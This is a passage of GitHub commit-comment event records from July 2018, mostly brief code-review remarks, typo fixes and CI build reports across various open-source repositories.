{"id":"7931130497","type":"CommitCommentEvent","actor":{"login":"vtjnash"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29626671,"position":null,"line":null,"path":null,"commit_id":"ae8e95f249732ce4555584e8d0d8e469c4119edb","created_at":"2018-07-06T21:58:16Z","updated_at":"2018-07-06T21:58:16Z","author_association":"MEMBER","body":"rerunning performance comparison in issue #27539, since I think we've recovered from many of these recent regressions: @nanosoldier `runbenchmarks(ALL, vs = \"@2ba3fbbd4ffb03eda89c942ce9bc422e265e3c86\")`"}},"created_at":"2018-07-06T21:58:16Z"}
{"id":"7931130743","type":"CommitCommentEvent","actor":{"login":"sagarkapare"},"repo":{"name":"caskdata/cdap-navigator"},"payload":{"comment":{"id":29626674,"position":null,"line":null,"path":null,"commit_id":"654c9e010674d2e6afd7f5f116fbe98cc1542ad6","created_at":"2018-07-06T21:58:22Z","updated_at":"2018-07-06T21:58:22Z","author_association":"CONTRIBUTOR","body":"LGTM. Please file JIRA for fixing it."}},"created_at":"2018-07-06T21:58:22Z"}
{"id":"7931139939","type":"CommitCommentEvent","actor":{"login":"jmd613"},"repo":{"name":"CrevolutionRoboticsProgramming/robot-code"},"payload":{"comment":{"id":29626696,"position":null,"line":null,"path":null,"commit_id":"91c52b6ac1f9078bcc3541b33d066ab197f8f759","created_at":"2018-07-06T22:01:19Z","updated_at":"2018-07-06T22:01:19Z","author_association":"MEMBER","body":"Incorrect commit message. Corrected commit: fixed definition errors"}},"created_at":"2018-07-06T22:01:19Z"}
{"id":"7931152027","type":"CommitCommentEvent","actor":{"login":"noahp"},"repo":{"name":"noahp/piesvg"},"payload":{"comment":{"id":29626730,"position":null,"line":null,"path":null,"commit_id":"550305be56f8e5f4a58de3e99855a01aa457de9c","created_at":"2018-07-06T22:05:19Z","updated_at":"2018-07-06T22:05:19Z","author_association":"OWNER","body":"Oof lacks gitmoji, doesn't meet contributor rules 😒"}},"created_at":"2018-07-06T22:05:19Z"}
{"id":"7931153974","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"letorbi/tarp.require"},"payload":{"comment":{"id":29626740,"position":18,"line":86,"path":"require.js","commit_id":"3a6ccc682ed384490bee7ba74cc1b3487ff3044a","created_at":"2018-07-06T22:05:58Z","updated_at":"2018-07-06T22:05:58Z","author_association":"NONE","body":"Like I said it doesn't matter because you don't target these browsers but yes adding custom properties on the instance may throw on some old browsers."}},"created_at":"2018-07-06T22:05:58Z"}
{"id":"7931154850","type":"CommitCommentEvent","actor":{"login":"sirDonovan"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":29626743,"position":null,"line":null,"path":null,"commit_id":"4e3af0d24354cb831330f98f4a0e8fdb0f22af78","created_at":"2018-07-06T22:06:14Z","updated_at":"2018-07-06T22:06:14Z","author_association":"COLLABORATOR","body":"Fixed in https://github.com/Zarel/Pokemon-Showdown/commit/95d396ccdcc0223af6b89ff1b261c6feb61c9f22. The cache wasn't invalidated because 2.9.2 satisfies the check for <code>^2.8.3</code>."}},"created_at":"2018-07-06T22:06:14Z"}
{"id":"7931157422","type":"CommitCommentEvent","actor":{"login":"mwarning"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29626753,"position":141,"line":328,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T22:07:11Z","updated_at":"2018-07-06T22:07:11Z","author_association":"NONE","body":"s.close();"}},"created_at":"2018-07-06T22:07:11Z"}
{"id":"7931157677","type":"CommitCommentEvent","actor":{"login":"dciechan94"},"repo":{"name":"dciechan94/upVote"},"payload":{"comment":{"id":29626754,"position":null,"line":null,"path":null,"commit_id":"564aad9f986d770c354fbbb3beb8525168f5e3f9","created_at":"2018-07-06T22:07:16Z","updated_at":"2018-07-06T22:07:16Z","author_association":"OWNER","body":"#5 "}},"created_at":"2018-07-06T22:07:16Z"}
{"id":"7931158697","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29626755,"position":17,"line":199,"path":"code/drasil-example/Drasil/Sections/SpecificSystemDescription.hs","commit_id":"70ffb514b54821ffe1937af3ea567888c593d852","created_at":"2018-07-06T22:07:36Z","updated_at":"2018-07-06T22:07:36Z","author_association":"COLLABORATOR","body":"Do we want a label just for the introduction of a section when there is a label for the entire section (when line 115 will works)? @szymczdm "}},"created_at":"2018-07-06T22:07:36Z"}
{"id":"7931165236","type":"CommitCommentEvent","actor":{"login":"Johnmacrocraft"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29626775,"position":10,"line":114,"path":"src/pocketmine/network/mcpe/protocol/LoginPacket.php","commit_id":"ee7c838040df9817eba7891212818fb6e5d35ebd","created_at":"2018-07-06T22:09:53Z","updated_at":"2018-07-06T22:09:53Z","author_association":"CONTRIBUTOR","body":"Hmmmmmmmmmm 🤔\r\n**key chain**, with space?"}},"created_at":"2018-07-06T22:09:53Z"}
{"id":"7931169074","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29626786,"position":10,"line":114,"path":"src/pocketmine/network/mcpe/protocol/LoginPacket.php","commit_id":"ee7c838040df9817eba7891212818fb6e5d35ebd","created_at":"2018-07-06T22:11:15Z","updated_at":"2018-07-06T22:11:15Z","author_association":"MEMBER","body":"well technically it's not a _key_ chain at all if you want to split hairs."}},"created_at":"2018-07-06T22:11:15Z"}
{"id":"7931169099","type":"CommitCommentEvent","actor":{"login":"mwarning"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29626787,"position":177,"line":364,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T22:11:16Z","updated_at":"2018-07-06T22:11:16Z","author_association":"NONE","body":"hm, das wäre ein ungewöhnliches Verhalten."}},"created_at":"2018-07-06T22:11:16Z"}
{"id":"7931173493","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29626796,"position":null,"line":null,"path":null,"commit_id":"7bb8954df36fcf84681abaed3885f824fd448ed6","created_at":"2018-07-06T22:12:51Z","updated_at":"2018-07-06T22:12:51Z","author_association":"COLLABORATOR","body":"I haven't been bumping up the dependencies of the other packages as I've worked. Will keep in mind to do that, however, I was wondering why it has been working without having updated the dependencies up until now..."}},"created_at":"2018-07-06T22:12:51Z"}
{"id":"7931177376","type":"CommitCommentEvent","actor":{"login":"Johnmacrocraft"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29626804,"position":10,"line":114,"path":"src/pocketmine/network/mcpe/protocol/LoginPacket.php","commit_id":"ee7c838040df9817eba7891212818fb6e5d35ebd","created_at":"2018-07-06T22:14:17Z","updated_at":"2018-07-06T22:14:17Z","author_association":"CONTRIBUTOR","body":"why not change it then"}},"created_at":"2018-07-06T22:14:17Z"}
{"id":"7931177847","type":"CommitCommentEvent","actor":{"login":"dakhnod"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29626805,"position":141,"line":328,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T22:14:28Z","updated_at":"2018-07-06T22:14:28Z","author_association":"OWNER","body":"eine zeilennummer wäre relativ praktisch."}},"created_at":"2018-07-06T22:14:28Z"}
{"id":"7931179240","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29626809,"position":10,"line":114,"path":"src/pocketmine/network/mcpe/protocol/LoginPacket.php","commit_id":"ee7c838040df9817eba7891212818fb6e5d35ebd","created_at":"2018-07-06T22:15:02Z","updated_at":"2018-07-06T22:15:02Z","author_association":"MEMBER","body":"It doesn't really matter, it's just a nit. I'm not going to go out of my way to fix it."}},"created_at":"2018-07-06T22:15:02Z"}
{"id":"7931187950","type":"CommitCommentEvent","actor":{"login":"jchampio"},"repo":{"name":"greenplum-db/gpupgrade"},"payload":{"comment":{"id":29626823,"position":14,"line":131,"path":"integrations/integrations_suite_test.go","commit_id":"087e6e639594e2dcc392b94eea5171cfe468be31","created_at":"2018-07-06T22:18:22Z","updated_at":"2018-07-06T22:18:22Z","author_association":"MEMBER","body":"s/initiaze/initialize/"}},"created_at":"2018-07-06T22:18:22Z"}
{"id":"7931190094","type":"CommitCommentEvent","actor":{"login":"bogdan7900"},"repo":{"name":"bogdan7900/hello-world"},"payload":{"comment":{"id":29626830,"position":null,"line":null,"path":null,"commit_id":"84c16bcb364b3084d2018bc63fb22b029d085bc5","created_at":"2018-07-06T22:19:12Z","updated_at":"2018-07-06T22:19:12Z","author_association":"OWNER","body":"Good work!"}},"created_at":"2018-07-06T22:19:12Z"}
{"id":"7931191989","type":"CommitCommentEvent","actor":{"login":"jm9e"},"repo":{"name":"Bitspark/slang-ui"},"payload":{"comment":{"id":29626834,"position":5,"line":612,"path":"src/app/utils.ts","commit_id":"e07e6714b7472f91a9029d5e7e9976ff5c4e0072","created_at":"2018-07-06T22:19:56Z","updated_at":"2018-07-06T22:19:56Z","author_association":"MEMBER","body":"I thought about using `Vec2` actually, but I don't need an orientation. I then decided against `Vec2` for performance reasons."}},"created_at":"2018-07-06T22:19:56Z"}
{"id":"7931200132","type":"CommitCommentEvent","actor":{"login":"roktas"},"repo":{"name":"omu/nokul"},"payload":{"comment":{"id":29626857,"position":6,"line":12,"path":"config/locales/defaults/tr.yml","commit_id":"cd1bff72748165b991060ba9857b079025fe458e","created_at":"2018-07-06T22:22:54Z","updated_at":"2018-07-06T22:22:54Z","author_association":"MEMBER","body":"`s/Aramaya/Arama/`"}},"created_at":"2018-07-06T22:22:54Z"}
{"id":"7931203766","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29626868,"position":null,"line":null,"path":null,"commit_id":"f2f7c4287ff257e7c219737b0d7416a7965c0c3e","created_at":"2018-07-06T22:24:12Z","updated_at":"2018-07-06T22:24:12Z","author_association":"MEMBER","body":"It looks like the patch commit for type_getattro.patch no longer exists. Does someone have a local copy?"}},"created_at":"2018-07-06T22:24:12Z"}
{"id":"7931219020","type":"CommitCommentEvent","actor":{"login":"Jonahgay"},"repo":{"name":"Jonahgay/Discord_-everyone"},"payload":{"comment":{"id":29626899,"position":2,"line":1,"path":"@everyone.py","commit_id":"c43b79fce2592a0e56e386e39d50ab61f2625f20","created_at":"2018-07-06T22:29:24Z","updated_at":"2018-07-06T22:29:24Z","author_association":"OWNER","body":"Make sure to import Modules before using them"}},"created_at":"2018-07-06T22:29:24Z"}
{"id":"7931231205","type":"CommitCommentEvent","actor":{"login":"thompson101913"},"repo":{"name":"rgant/homedir"},"payload":{"comment":{"id":29626934,"position":15,"line":15,"path":"Library/Application-Support/Firefox/Profiles/robgant.default/gm_scripts/Block_In_Page_JavaScript/Block_In_Page_JavaScript.user.js","commit_id":"30b1dded1ed30c0272f4b9b7c7a3a35f8ba623c5","created_at":"2018-07-06T22:33:52Z","updated_at":"2018-07-06T22:33:52Z","author_association":"NONE","body":"No more ublocks"}},"created_at":"2018-07-06T22:33:52Z"}
{"id":"7931231255","type":"CommitCommentEvent","actor":{"login":"IgnacioSP"},"repo":{"name":"IgnacioSP/MonsterHunter4UDatabase"},"payload":{"comment":{"id":29626935,"position":null,"line":null,"path":null,"commit_id":"d974dbe3cefe02676a97f8243b320aeb68ff1160","created_at":"2018-07-06T22:33:53Z","updated_at":"2018-07-06T22:33:53Z","author_association":"OWNER","body":"Puras weas"}},"created_at":"2018-07-06T22:33:53Z"}
{"id":"7931231771","type":"CommitCommentEvent","actor":{"login":"IgnacioSP"},"repo":{"name":"IgnacioSP/MonsterHunter4UDatabase"},"payload":{"comment":{"id":29626937,"position":2,"line":1,"path":"build.gradle","commit_id":"d974dbe3cefe02676a97f8243b320aeb68ff1160","created_at":"2018-07-06T22:34:05Z","updated_at":"2018-07-06T22:34:05Z","author_association":"OWNER","body":"Mira el weon aburrio"}},"created_at":"2018-07-06T22:34:05Z"}
{"id":"7931233887","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29626944,"position":null,"line":null,"path":null,"commit_id":"ece1724d71ce1f8ebc476d2005fb7e172e7136f9","created_at":"2018-07-06T22:34:49Z","updated_at":"2018-07-06T22:34:49Z","author_association":"NONE","body":"Allow-Multiple-AirLoops-in-Airflow-Netwrok-Model (lgu1234) - Win64-Windows-7-VisualStudio-14: OK (2935 of 2935 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: BND diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ece1724d71ce1f8ebc476d2005fb7e172e7136f9-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ece1724d71ce1f8ebc476d2005fb7e172e7136f9-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T22:34:49Z"}
{"id":"7931239158","type":"CommitCommentEvent","actor":{"login":"magedyousef"},"repo":{"name":"magedyousef/mnfla-project"},"payload":{"comment":{"id":29626964,"position":null,"line":null,"path":null,"commit_id":"19470c2d4ff0113e1fcd176e25eaadf28f2f0b02","created_at":"2018-07-06T22:36:47Z","updated_at":"2018-07-06T22:36:47Z","author_association":"OWNER","body":"x"}},"created_at":"2018-07-06T22:36:47Z"}
{"id":"7931241990","type":"CommitCommentEvent","actor":{"login":"amilcar-andrade"},"repo":{"name":"googlesamples/android-architecture-components"},"payload":{"comment":{"id":29626972,"position":71,"line":71,"path":"BasicSample/app/src/main/java/com/example/android/persistence/ProductFragment.java","commit_id":"2e09898630783bf863ddd82f1c30817da9a2fe32","created_at":"2018-07-06T22:37:45Z","updated_at":"2018-07-06T22:37:45Z","author_association":"NONE","body":"@JoseAlcerreca is there an advantage of getting the `factory` inside `onActivityCreated` vs `onCreate` like the documentation example, https://developer.android.com/topic/libraries/architecture/viewmodel#sharing? \r\n\r\nIs `onActivityCreated` recommended because you know that for sure you have an `activity` at that time? "}},"created_at":"2018-07-06T22:37:45Z"}
{"id":"7931246564","type":"CommitCommentEvent","actor":{"login":"dpeca"},"repo":{"name":"serghey-rodin/vesta"},"payload":{"comment":{"id":29626998,"position":null,"line":null,"path":null,"commit_id":"f68bb795deb153bbb0b9da3a03b0f7377455bee9","created_at":"2018-07-06T22:39:35Z","updated_at":"2018-07-06T22:39:35Z","author_association":"COLLABORATOR","body":"this commit generates error in console during vestacp installation on deb9.\r\n```\r\nmv: cannot move '/usr/local/vesta/data/ips/' to a subdirectory of itself, '/usr/local/vesta/data/ips/159.69.38.196'\r\nsed: can't read /usr/local/vesta/data/users/*/dns/*.conf: No such file or directory\r\nsed: -e expression #1, char 0: no previous regular expression\r\nsed: -e expression #1, char 0: no previous regular expression\r\n```"}},"created_at":"2018-07-06T22:39:35Z"}
{"id":"7931249062","type":"CommitCommentEvent","actor":{"login":"mbarnes-sb"},"repo":{"name":"fl4re/open_bilrost_server"},"payload":{"comment":{"id":29627001,"position":11,"line":11,"path":"config/default.json5","commit_id":"91898ca39e402097eb65e79a6d30ed18fbda77da","created_at":"2018-07-06T22:40:34Z","updated_at":"2018-07-06T22:40:34Z","author_association":"NONE","body":"@dgaya @RemiArnaud why is `@sb` registry still be referenced? I think this should be scrubbed out."}},"created_at":"2018-07-06T22:40:34Z"}
{"id":"7931249251","type":"CommitCommentEvent","actor":{"login":"mbarnes-sb"},"repo":{"name":"fl4re/open_bilrost_server"},"payload":{"comment":{"id":29627002,"position":14,"line":14,"path":"config/default.json5","commit_id":"91898ca39e402097eb65e79a6d30ed18fbda77da","created_at":"2018-07-06T22:40:39Z","updated_at":"2018-07-06T22:40:39Z","author_association":"NONE","body":"@dgaya @RemiArnaud why is `@sb` registry still be referenced? I think this should be scrubbed out."}},"created_at":"2018-07-06T22:40:39Z"}
{"id":"7931251038","type":"CommitCommentEvent","actor":{"login":"haakonnessjoen"},"repo":{"name":"bitfocus/companion-module-livecore"},"payload":{"comment":{"id":29627006,"position":5,"line":189,"path":"analogway_livecore.js","commit_id":"2e69f43ce2ba5021de9021c62f870bdb82f03aef","created_at":"2018-07-06T22:41:25Z","updated_at":"2018-07-06T22:41:25Z","author_association":"MEMBER","body":"This is not referenced in any actions. It will do nothing."}},"created_at":"2018-07-06T22:41:25Z"}
{"id":"7931251178","type":"CommitCommentEvent","actor":{"login":"mbarnes-sb"},"repo":{"name":"fl4re/open_bilrost_server"},"payload":{"comment":{"id":29627008,"position":20,"line":20,"path":"package.json","commit_id":"91898ca39e402097eb65e79a6d30ed18fbda77da","created_at":"2018-07-06T22:41:29Z","updated_at":"2018-07-06T22:41:29Z","author_association":"NONE","body":"@dgaya I think this url should simply be `https` scheme."}},"created_at":"2018-07-06T22:41:29Z"}
{"id":"7931254975","type":"CommitCommentEvent","actor":{"login":"mbarnes-sb"},"repo":{"name":"fl4re/open_bilrost_server"},"payload":{"comment":{"id":29627012,"position":4,"line":4,"path":"api.raml","commit_id":"91898ca39e402097eb65e79a6d30ed18fbda77da","created_at":"2018-07-06T22:43:03Z","updated_at":"2018-07-06T22:43:03Z","author_association":"NONE","body":"@dgaya @RemiArnaud is this URL a security breach?"}},"created_at":"2018-07-06T22:43:03Z"}
{"id":"7931258667","type":"CommitCommentEvent","actor":{"login":"haakonnessjoen"},"repo":{"name":"bitfocus/companion-module-livecore"},"payload":{"comment":{"id":29627021,"position":31,"line":612,"path":"analogway_livecore.js","commit_id":"68049b48473f7e8d7fb3906a0e9925e660bb344f","created_at":"2018-07-06T22:44:28Z","updated_at":"2018-07-06T22:44:28Z","author_association":"MEMBER","body":"If you see here, it cannot have worked before the fix @dnmeid . action.options.option is not the same as actions.options[option] or option (for getting the id). So this fix has clearly fixed the selection.\r\n\r\nYou checked if an unexistant option called \"option\" was 1 or 2. But my fix checks if the option called 1 (etc) is set to 1 or 2."}},"created_at":"2018-07-06T22:44:28Z"}
{"id":"7931260079","type":"CommitCommentEvent","actor":{"login":"haakonnessjoen"},"repo":{"name":"bitfocus/companion-module-livecore"},"payload":{"comment":{"id":29627030,"position":19,"line":493,"path":"analogway_livecore.js","commit_id":"2e69f43ce2ba5021de9021c62f870bdb82f03aef","created_at":"2018-07-06T22:45:03Z","updated_at":"2018-07-06T22:45:03Z","author_association":"MEMBER","body":"I guess I went overboard with the \\n's. ;)"}},"created_at":"2018-07-06T22:45:03Z"}
{"id":"7931261971","type":"CommitCommentEvent","actor":{"login":"clue"},"repo":{"name":"friends-of-reactphp/mysql"},"payload":{"comment":{"id":29627037,"position":null,"line":null,"path":null,"commit_id":"57710a16485a26dfe211fc33a73937cb18aa9c43","created_at":"2018-07-06T22:45:50Z","updated_at":"2018-07-06T22:45:50Z","author_association":"CONTRIBUTOR","body":"@iNewLegend Can you be more specific? Do you see anything that's not covered in #68?"}},"created_at":"2018-07-06T22:45:50Z"}
{"id":"7931269577","type":"CommitCommentEvent","actor":{"login":"haakonnessjoen"},"repo":{"name":"bitfocus/companion-module-livecore"},"payload":{"comment":{"id":29627054,"position":14,"line":493,"path":"analogway_livecore.js","commit_id":"2e69f43ce2ba5021de9021c62f870bdb82f03aef","created_at":"2018-07-06T22:49:05Z","updated_at":"2018-07-06T22:49:05Z","author_association":"MEMBER","body":"I guess I forgot the 1 here, and had one \\n too many. But it really needs to be referenced by an action like I did here."}},"created_at":"2018-07-06T22:49:05Z"}
{"id":"7931275571","type":"CommitCommentEvent","actor":{"login":"javalava666"},"repo":{"name":"javalava666/canvasClock"},"payload":{"comment":{"id":29627065,"position":3,"line":3,"path":"README.md","commit_id":"5e5368442f03d82f4d8e75e69c2bf838b960377d","created_at":"2018-07-06T22:51:32Z","updated_at":"2018-07-06T22:51:32Z","author_association":"OWNER","body":"just putting some whitespace between the title and the code"}},"created_at":"2018-07-06T22:51:32Z"}
{"id":"7931276977","type":"CommitCommentEvent","actor":{"login":"vikas-garud"},"repo":{"name":"vikas-garud/testzone"},"payload":{"comment":{"id":29627069,"position":null,"line":null,"path":null,"commit_id":"d8f0f07c548eb2c71eadfd180467414d3d425661","created_at":"2018-07-06T22:52:07Z","updated_at":"2018-07-06T22:52:07Z","author_association":"OWNER","body":"why is this thirteen ?"}},"created_at":"2018-07-06T22:52:07Z"}
{"id":"7931277325","type":"CommitCommentEvent","actor":{"login":"javalava666"},"repo":{"name":"javalava666/canvasClock"},"payload":{"comment":{"id":29627070,"position":2,"line":2,"path":"README.md","commit_id":"5e5368442f03d82f4d8e75e69c2bf838b960377d","created_at":"2018-07-06T22:52:16Z","updated_at":"2018-07-06T22:52:16Z","author_association":"OWNER","body":"just spacing a bit"}},"created_at":"2018-07-06T22:52:16Z"}
{"id":"7931278976","type":"CommitCommentEvent","actor":{"login":"vikas-garud"},"repo":{"name":"vikas-garud/testzone"},"payload":{"comment":{"id":29627075,"position":1,"line":29,"path":"testzone.go","commit_id":"d8f0f07c548eb2c71eadfd180467414d3d425661","created_at":"2018-07-06T22:52:59Z","updated_at":"2018-07-06T22:52:59Z","author_association":"OWNER","body":"why is this eleven"}},"created_at":"2018-07-06T22:52:59Z"}
{"id":"7931280479","type":"CommitCommentEvent","actor":{"login":"kutsan"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29627080,"position":null,"line":null,"path":null,"commit_id":"fc42abb3353585944973a732aad2c56741065a67","created_at":"2018-07-06T22:53:37Z","updated_at":"2018-07-06T22:53:37Z","author_association":"NONE","body":"You can also try this if you don't want to see tilde symbols.\r\n\r\n```vim\r\n\" Hide tilde symbols.\r\nhighlight! EndOfBuffer ctermfg=bg guifg=bg\r\n```\r\n\r\nThese symbols:\r\n\r\n![image](https://user-images.githubusercontent.com/10108377/42403242-7f7f2330-8188-11e8-96e2-3070fa6ed8fe.png)"}},"created_at":"2018-07-06T22:53:37Z"}
{"id":"7931280488","type":"CommitCommentEvent","actor":{"login":"sfgghh"},"repo":{"name":"mozilla/addons-frontend"},"payload":{"comment":{"id":29627081,"position":2,"line":25,"path":"src/amo/components/Header/index.js","commit_id":"f283381e9f520c782b55bfde8a755a03a2b092a7","created_at":"2018-07-06T22:53:38Z","updated_at":"2018-07-06T22:53:38Z","author_association":"NONE","body":"Dqriri1414@gmail"}},"created_at":"2018-07-06T22:53:38Z"}
{"id":"7931282556","type":"CommitCommentEvent","actor":{"login":"sfgghh"},"repo":{"name":"mozilla/addons-frontend"},"payload":{"comment":{"id":29627084,"position":12,"line":93,"path":"tests/unit/amo/components/TestHeader.js","commit_id":"f283381e9f520c782b55bfde8a755a03a2b092a7","created_at":"2018-07-06T22:54:29Z","updated_at":"2018-07-06T22:54:29Z","author_association":"NONE","body":"Faisal1389"}},"created_at":"2018-07-06T22:54:29Z"}
{"id":"7931283445","type":"CommitCommentEvent","actor":{"login":"ensieblume"},"repo":{"name":"ensieblume/HomeWork2VBA"},"payload":{"comment":{"id":29627089,"position":null,"line":null,"path":null,"commit_id":"a3daba37d2f5dd2419e81fa016f21a75da8174a9","created_at":"2018-07-06T22:54:53Z","updated_at":"2018-07-06T22:54:53Z","author_association":"OWNER","body":"You are well on your way to becoming a programmer and Excel master! In this homework assignment you will use VBA scripting to analyze real stock market data. Depending on your comfort level with VBA, choose your assignment from Easy, Moderate, or Hard below.\r\n\r\n\r\nFiles\r\n\r\n\r\nTest Data - Use this while developing your scripts.\r\nStock Data - Run your scripts on this data to generate the final homework report."}},"created_at":"2018-07-06T22:54:53Z"}
{"id":"7931284279","type":"CommitCommentEvent","actor":{"login":"Morichannn"},"repo":{"name":"coolstar/electra-ipas"},"payload":{"comment":{"id":29627096,"position":null,"line":null,"path":null,"commit_id":"44b82d692847f3b386f877064545b07b58f188f5","created_at":"2018-07-06T22:55:14Z","updated_at":"2018-07-06T22:55:14Z","author_association":"NONE","body":"I feel it. It is close."}},"created_at":"2018-07-06T22:55:14Z"}
{"id":"7931287473","type":"CommitCommentEvent","actor":{"login":"RemiArnaud"},"repo":{"name":"fl4re/open_bilrost_server"},"payload":{"comment":{"id":29627104,"position":20,"line":20,"path":"package.json","commit_id":"91898ca39e402097eb65e79a6d30ed18fbda77da","created_at":"2018-07-06T22:56:36Z","updated_at":"2018-07-06T22:56:36Z","author_association":"NONE","body":"@mbarnes-sb see https://docs.npmjs.com/files/package.json#git-urls-as-dependencies"}},"created_at":"2018-07-06T22:56:36Z"}
{"id":"7931290600","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"letorbi/tarp.require"},"payload":{"comment":{"id":29627112,"position":26,"line":106,"path":"require.js","commit_id":"3a6ccc682ed384490bee7ba74cc1b3487ff3044a","created_at":"2018-07-06T22:58:02Z","updated_at":"2018-07-06T22:58:02Z","author_association":"NONE","body":"noprob but the rest is wrong too: `timeout` will throw if the the 3rd argument of open is false.\r\n\r\n```\r\nif (asyn) request.timeout = 1000;\r\n"}},"created_at":"2018-07-06T22:58:02Z"}
{"id":"7931291838","type":"CommitCommentEvent","actor":{"login":"natemcmaster"},"repo":{"name":"aspnet/EntityFramework.Docs"},"payload":{"comment":{"id":29627119,"position":null,"line":null,"path":null,"commit_id":"fd50ac53b93a03825dcbb42ed2e7ca95ca858d5f","created_at":"2018-07-06T22:58:35Z","updated_at":"2018-07-06T22:58:35Z","author_association":"MEMBER","body":"Thanks for fixing it!"}},"created_at":"2018-07-06T22:58:35Z"}
{"id":"7931293922","type":"CommitCommentEvent","actor":{"login":"emily-hou1"},"repo":{"name":"mozilla/send"},"payload":{"comment":{"id":29627129,"position":null,"line":null,"path":null,"commit_id":"f98bc0878ca6a3e6dac6842770d604799811f308","created_at":"2018-07-06T22:59:29Z","updated_at":"2018-07-06T22:59:29Z","author_association":"COLLABORATOR","body":"Note:\r\nTemporarily disabled the streams polyfill to play nice with serviceworker, so this only works in chrome (and only in prod because serviceworker requires https connection)\r\n"}},"created_at":"2018-07-06T22:59:29Z"}
{"id":"7931297841","type":"CommitCommentEvent","actor":{"login":"Jawnnypoo"},"repo":{"name":"Commit451/skyhook"},"payload":{"comment":{"id":29627141,"position":null,"line":null,"path":null,"commit_id":"19f2ce150364aca22979c831e2d0ed50f06b6b8d","created_at":"2018-07-06T23:01:03Z","updated_at":"2018-07-06T23:01:03Z","author_association":"MEMBER","body":"Hahaha, oops, you saw that? 👀 "}},"created_at":"2018-07-06T23:01:03Z"}
{"id":"7931302391","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29627158,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-06T23:03:08Z","updated_at":"2018-07-06T23:03:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T23:03:08Z"}
{"id":"7931305336","type":"CommitCommentEvent","actor":{"login":"HansVanEijsden"},"repo":{"name":"plinss/acmebot"},"payload":{"comment":{"id":29627177,"position":null,"line":null,"path":null,"commit_id":"3e3ce5fa7901b3b32ab69c8ad6363ba79fb9c626","created_at":"2018-07-06T23:04:18Z","updated_at":"2018-07-06T23:04:18Z","author_association":"NONE","body":"Thank you very much! This fixed all my `Deserialization error: Status not recognized` errors."}},"created_at":"2018-07-06T23:04:18Z"}
{"id":"7931309783","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29627193,"position":null,"line":null,"path":null,"commit_id":"6c7531ea10c5afa5ef04487def2c5772a1a5d480","created_at":"2018-07-06T23:06:22Z","updated_at":"2018-07-06T23:06:22Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2313 of 2313 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a 